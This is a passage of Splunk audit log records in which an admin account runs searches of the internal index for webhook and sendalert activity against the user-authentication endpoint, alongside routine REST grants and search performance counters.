invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AN" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:04:36.305, user=admin, action=search, info=completed, search_id='1665079455.47', has_error_warn=false, fully_completed_search=true, total_run_time=0.07, event_count=9, result_count=9, available_count=9, scan_count=11, drop_count=0, exec_time=1665079455, api_et=1664992800.000000000, api_lt=1665079455.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664992800.000000000, search_lt=1665079455.000000000, is_realtime=0, savedsearch_name="", search_startup_time="43", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_5f140e96cf60e27b", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=1, considered_events=11, total_slices=25, decompressed_slices=5, duration.command.search.index=1, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=2, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, sourcetype_count__splunkd_ui_access=9, roles='admin+power+user', search='search index=_internal webhook user=user'] Audit:[timestamp=10-06-2022 18:04:36.304, user=admin, action=search, info=canceled, search_id='ta_1665079389.42', has_error_warn=true, fully_completed_search=true, total_run_time=0.00, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079389, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="0", is_prjob=false, app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:04:30.407, user=admin, action=search, info=granted REST: /search/jobs/1665079455.47/control] Audit:[timestamp=10-06-2022 18:04:29.812, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:04:19.820, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:04:18.500, user=admin, action=search, info=granted REST: /search/jobs/1665079455.47/events] Audit:[timestamp=10-06-2022 18:04:15.648, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:04:15.611, user=admin, action=search, info=granted REST: /search/jobs/1665079455.47/timeline] Audit:[timestamp=10-06-2022 18:04:15.540, user=admin, action=search, info=granted REST: /search/jobs/1665079455.47/events] Audit:[timestamp=10-06-2022 18:04:15.539, user=admin, action=search, info=granted REST: /search/jobs/1665079455.47/summary] Audit:[timestamp=10-06-2022 18:04:15.399, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:04:15.258, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:04:15.258, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:04:15.257, user=admin, action=search, info=granted REST: /search/jobs/1665079455.47] Audit:[timestamp=10-06-2022 18:04:15.120, user=admin, action=quota,search_id=1665079455.47, elapsed_ms=1, cache_size=10] Audit:[timestamp=10-06-2022 18:04:15.119, user=admin, action=search, info=granted , search_id='1665079455.47', search='search index=_internal webhook user=user', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 18:00:00 2022', apiEndTime='Thu Oct 6 18:04:15 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:04:15.118, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:04:15.111, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:04:14.924, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:04:14.924, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:04:14.924, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:04:14.924, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:04:14.712, user=admin, action=search, info=granted REST: /search/intentionsparser] Audit:[timestamp=10-06-2022 18:04:09.813, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:04:06.310, user=admin, action=search, info=canceled, search_id='ta_1665079365.36', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=8, available_count=0, scan_count=0, drop_count=0, exec_time=1665079365, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="12", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_6b2d289e0bafcf8a", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND sen" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:04:06.309, user=admin, action=search, info=canceled, search_id='ta_1665079361.34', has_error_warn=true, fully_completed_search=true, total_run_time=0.00, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079361, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="0", is_prjob=false, app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:04:06.308, user=admin, action=search, info=canceled, search_id='ta_1665079372.37', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=50, available_count=0, scan_count=0, drop_count=0, exec_time=1665079372, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="9", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_672e0e8817baac83", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND sendalert w" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:04:06.307, user=admin, action=search, info=canceled, search_id='ta_1665079361.33', has_error_warn=true, fully_completed_search=true, total_run_time=0.00, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079361, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="0", is_prjob=false, app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:04:06.306, user=admin, action=search, info=canceled, search_id='ta_1665079365.35', has_error_warn=false, fully_completed_search=true, total_run_time=0.03, event_count=0, result_count=50, available_count=0, scan_count=0, drop_count=0, exec_time=1665079365, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="0", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_ae0a1c4df16fa0f7", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND s" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:04:06.305, user=admin, action=search, info=canceled, search_id='ta_1665079372.38', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=8, available_count=0, scan_count=0, drop_count=0, exec_time=1665079372, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="10", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_8fa4b2f93d582926", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND sendalert we" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:04:06.304, user=admin, action=search, info=canceled, search_id='ta_1665079361.32', has_error_warn=false, fully_completed_search=true, total_run_time=0.01, event_count=0, result_count=0, available_count=0, scan_count=0, drop_count=0, exec_time=1665079361, api_et=N/A, api_lt=N/A, api_index_et=N/A, api_index_lt=N/A, search_et=N/A, search_lt=N/A, is_realtime=0, savedsearch_name="", search_startup_time="10", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_850589489917e347", app="search", provenance="N/A", mode="historical", is_proxied=false, searched_buckets=0, eliminated_buckets=0, considered_events=0, total_slices=0, decompressed_slices=0, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=0, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='typeahead prefix="index=_internal uri=*/services/authentication/users* A" max_time="1" count="50" use_cache=1'] Audit:[timestamp=10-06-2022 18:04:03.994, user=admin, action=search, info=granted REST: /search/jobs/1665079413.46/control] Audit:[timestamp=10-06-2022 18:03:59.839, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:03:49.819, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:03:48.995, user=admin, action=search, info=granted REST: /search/jobs/1665079413.46/control] Audit:[timestamp=10-06-2022 18:03:39.809, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:03:36.306, user=admin, action=search, info=completed, search_id='1665079413.46', has_error_warn=false, fully_completed_search=true, total_run_time=0.07, event_count=10, result_count=10, available_count=10, scan_count=10, drop_count=0, exec_time=1665079413, api_et=1664992800.000000000, api_lt=1665079413.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664992800.000000000, search_lt=1665079413.000000000, is_realtime=0, savedsearch_name="", search_startup_time="43", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_fd52ab5837e21c74", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=1, considered_events=10, total_slices=24, decompressed_slices=4, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=1, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, sourcetype_count__splunkd_ui_access=10, roles='admin+power+user', search='search index=_internal webhook'] Audit:[timestamp=10-06-2022 18:03:36.305, user=admin, action=search, info=completed, search_id='1665079389.43', has_error_warn=false, fully_completed_search=true, total_run_time=0.14, event_count=0, result_count=0, available_count=0, scan_count=9, drop_count=0, exec_time=1665079389, api_et=1664992800.000000000, api_lt=1665079389.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664992800.000000000, search_lt=1665079389.000000000, is_realtime=0, savedsearch_name="", search_startup_time="127", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_4630ab3d47c1896d", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=1, considered_events=9, total_slices=24, decompressed_slices=4, duration.command.search.index=1, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=22, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='search index=_internal uri=*/services/authentication/users* AND "webhook"'] Audit:[timestamp=10-06-2022 18:03:36.304, user=admin, action=search, info=completed, search_id='1665079393.45', has_error_warn=false, fully_completed_search=true, total_run_time=0.08, event_count=0, result_count=0, available_count=0, scan_count=9, drop_count=0, exec_time=1665079393, api_et=1664992800.000000000, api_lt=1665079393.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664992800.000000000, search_lt=1665079393.000000000, is_realtime=0, savedsearch_name="", search_startup_time="57", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_4630ab3d47c1896d", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=1, considered_events=9, total_slices=24, decompressed_slices=4, duration.command.search.index=1, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=2, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='search index=_internal uri=*/services/authentication/users* "webhook"'] Audit:[timestamp=10-06-2022 18:03:34.219, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:03:34.186, user=admin, action=search, info=granted REST: /search/jobs/1665079413.46/timeline] Audit:[timestamp=10-06-2022 18:03:34.127, user=admin, action=search, info=granted REST: /search/jobs/1665079413.46/events] Audit:[timestamp=10-06-2022 18:03:34.127, user=admin, action=search, info=granted REST: /search/jobs/1665079413.46/summary] Audit:[timestamp=10-06-2022 18:03:33.987, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:03:33.846, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:33.845, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:33.845, user=admin, action=search, info=granted REST: /search/jobs/1665079413.46] Audit:[timestamp=10-06-2022 18:03:33.709, user=admin, action=quota,search_id=1665079413.46, elapsed_ms=1, cache_size=9] Audit:[timestamp=10-06-2022 18:03:33.708, user=admin, action=search, info=granted , search_id='1665079413.46', search='search index=_internal webhook', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 18:00:00 2022', apiEndTime='Thu Oct 6 18:03:33 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:03:33.707, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:03:33.705, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:03:33.552, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:33.552, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:33.552, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:03:33.552, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:03:29.809, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:03:28.597, user=admin, action=search, info=granted REST: /search/jobs/1665079393.45/control] Audit:[timestamp=10-06-2022 18:03:19.813, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:03:13.828, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:03:13.737, user=admin, action=search, info=granted REST: /search/jobs/1665079393.45/summary] Audit:[timestamp=10-06-2022 18:03:13.737, user=admin, action=search, info=granted REST: /search/jobs/1665079393.45/events] Audit:[timestamp=10-06-2022 18:03:13.597, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:03:13.451, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:13.451, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:13.450, user=admin, action=search, info=granted REST: /search/jobs/1665079393.45] Audit:[timestamp=10-06-2022 18:03:13.311, user=admin, action=quota,search_id=1665079393.45, elapsed_ms=1, cache_size=8] Audit:[timestamp=10-06-2022 18:03:13.311, user=admin, action=search, info=granted , search_id='1665079393.45', search='search index=_internal uri=*/services/authentication/users* "webhook"', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 18:00:00 2022', apiEndTime='Thu Oct 6 18:03:13 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:03:13.310, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:03:13.308, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:03:13.155, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:13.155, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:13.155, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:03:13.155, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:03:11.664, user=admin, action=search, info=granted , search_id='ta_1665079391.44', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AN" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:03:10.493, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:10.493, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:10.492, user=admin, action=search, info=granted REST: /search/jobs/1665079389.43] Audit:[timestamp=10-06-2022 18:03:10.488, user=admin, action=search, info=granted REST: /search/jobs/1665079389.43/events] Audit:[timestamp=10-06-2022 18:03:10.480, user=admin, action=search, info=granted REST: /search/jobs/1665079389.43/summary] Audit:[timestamp=10-06-2022 18:03:10.385, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:03:10.342, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:10.342, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:10.341, user=admin, action=search, info=granted REST: /search/jobs/1665079389.43] Audit:[timestamp=10-06-2022 18:03:10.327, user=admin, action=search, info=granted REST: /search/jobs/1665079389.43/events] Audit:[timestamp=10-06-2022 18:03:10.327, user=admin, action=search, info=granted REST: /search/jobs/1665079389.43/summary] Audit:[timestamp=10-06-2022 18:03:10.185, user=admin, action=search, info=granted REST: /search/timeparser] Audit:[timestamp=10-06-2022 18:03:10.047, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:10.047, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:10.046, user=admin, action=search, info=granted REST: /search/jobs/1665079389.43] Audit:[timestamp=10-06-2022 18:03:09.910, user=admin, action=quota,search_id=1665079389.43, elapsed_ms=1, cache_size=7] Audit:[timestamp=10-06-2022 18:03:09.909, user=admin, action=search, info=granted , search_id='1665079389.43', search='search index=_internal uri=*/services/authentication/users* AND "webhook"', autojoin='1', buckets=300, ttl=600, max_count=500000, maxtime=8640000, enable_lookups='1', extra_fields='*', apiStartTime='Wed Oct 5 18:00:00 2022', apiEndTime='Thu Oct 6 18:03:09 2022', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="UI:Search", mode="historical"] Audit:[timestamp=10-06-2022 18:03:09.909, user=admin, action=search, info=granted REST: /search/jobs] Audit:[timestamp=10-06-2022 18:03:09.907, user=admin, action=search, info=granted REST: /search/ast] Audit:[timestamp=10-06-2022 18:03:09.812, user=admin, action=list_health, info=granted object="splunkd" operation=list] Audit:[timestamp=10-06-2022 18:03:09.757, user=admin, action=list_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:09.757, user=admin, action=select_workload_pools, info=granted ] Audit:[timestamp=10-06-2022 18:03:09.757, user=admin, action=edit_search_schedule_window, info=granted ] Audit:[timestamp=10-06-2022 18:03:09.757, user=admin, action=edit_search_schedule_priority, info=granted ] Audit:[timestamp=10-06-2022 18:03:09.030, user=admin, action=search, info=granted , search_id='ta_1665079389.42', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:03:08.459, user=admin, action=search, info=granted , search_id='ta_1665079388.41', search='typeahead prefix="index=_internal uri=*/services/authentication/users* AND" max_time="1" count="50" use_cache=1', autojoin='0', buckets=0, ttl=10, max_count=50, maxtime=8640000, enable_lookups='0', extra_fields='', apiStartTime='ZERO_TIME', apiEndTime='ZERO_TIME', apiIndexStartTime='ZERO_TIME', apiIndexEndTime='ZERO_TIME', savedsearch_name="", is_proxied=false, app="search", provenance="N/A", mode="historical"] Audit:[timestamp=10-06-2022 18:03:06.306, user=admin, action=search, info=completed, search_id='1665079384.40', has_error_warn=false, fully_completed_search=true, total_run_time=0.07, event_count=0, result_count=0, available_count=0, scan_count=9, drop_count=0, exec_time=1665079384, api_et=1664992800.000000000, api_lt=1665079384.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664992800.000000000, search_lt=1665079384.000000000, is_realtime=0, savedsearch_name="", search_startup_time="44", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_9069224257585be0", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=1, considered_events=9, total_slices=24, decompressed_slices=4, duration.command.search.index=0, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=2, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='search index=_internal uri=*/services/authentication/users* AND "sendalert" "webhook"'] Audit:[timestamp=10-06-2022 18:03:06.304, user=admin, action=search, info=completed, search_id='1665079374.39', has_error_warn=false, fully_completed_search=true, total_run_time=0.13, event_count=0, result_count=0, available_count=0, scan_count=9, drop_count=0, exec_time=1665079374, api_et=1664992800.000000000, api_lt=1665079374.000000000, api_index_et=N/A, api_index_lt=N/A, search_et=1664992800.000000000, search_lt=1665079374.000000000, is_realtime=0, savedsearch_name="", search_startup_time="60", is_prjob=false, acceleration_id="1A171FB3-8BB1-46D7-B58E-285CDB72E4AF_search_admin_e4024639c4056293", app="search", provenance="UI:Search", mode="historical", is_proxied=false, searched_buckets=2, eliminated_buckets=1, considered_events=9, total_slices=24, decompressed_slices=4, duration.command.search.index=1, invocations.command.search.index.bucketcache.hit=0, duration.command.search.index.bucketcache.hit=0, invocations.command.search.index.bucketcache.miss=0, duration.command.search.index.bucketcache.miss=0, invocations.command.search.index.bucketcache.error=0, duration.command.search.rawdata=22, invocations.command.search.rawdata.bucketcache.hit=0, duration.command.search.rawdata.bucketcache.hit=0, invocations.command.search.rawdata.bucketcache.miss=0, duration.command.search.rawdata.bucketcache.miss=0, invocations.command.search.rawdata.bucketcache.error=0, roles='admin+power+user', search='search index=_internal uri=*/services/authentication/users* AND sendalert webhook'] Audit:[timestamp=10-06-2022 18:03:06.303, user=admin, action=search, info=canceled, search_id='ta_1665079303.28', has_error_warn=false, 